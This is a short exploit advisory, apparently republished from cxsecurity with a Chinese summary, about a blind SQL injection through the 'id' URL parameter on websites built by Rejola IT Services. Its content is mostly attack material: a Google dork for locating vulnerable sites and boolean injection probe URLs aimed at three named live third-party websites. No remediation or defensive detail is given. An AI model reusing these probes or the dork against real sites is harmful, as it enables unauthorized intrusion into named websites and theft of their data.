Rejola IT Services - Blind SQL Injection Vulnerability

Rejola IT Services - Blind SQL Injection Vulnerability
Rejola IT Services开发的网站存在盲SQL注入漏洞，攻击者可通过URL中的`id`参数利用此漏洞进行攻击。示例显示受影响网站包括`single-product.php`、`blog1.php`和`destination-detail.php`等页面。 2025-5-1 18:25:12 Author: cxsecurity.com(查看原文) 阅读量:28 收藏

********************************************************* # Exploit Title: Rejola IT Services - Blind SQL Injection Vulnerability # Date: 2025-04-30 # Exploit Author: AmirHossein Abdollahi | Mr_Amir_Typer # Google Dork: intext:"By Rejola IT Services" # Category: WebApps # Tested On: Windows, Firefox ********************************************************* [+] Vulnerable Parameter: `id` in URLs with `.php?id=` ********************************************************* ### Demo 1: https://josh.community/single-product.php?id=53' and 1=1--+ https://josh.community/single-product.php?id=53' and 1=2--+ ### Demo 2: https://shinysurendran.com/blog1.php?id=7' and 1=1--+ https://shinysurendran.com/blog1.php?id=7' and 1=2--+ ### Demo 3: https://365tours.in/destination-detail.php?id=365T_00072' and 1=1--+ https://365tours.in/destination-detail.php?id=365T_00072' and 1=2--+ ********************************************************* [+] Google Dork: intext:"By Rejola IT Services" ********************************************************* # Discovered by: AmirHossein Abdollahi | Mr_Amir_Typer

Thanks for you comment!
Your message is in quarantine 48 hours.

文章来源: https://cxsecurity.com/issue/WLB-2025050005
如有侵权请联系:admin#unsafe.sh

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.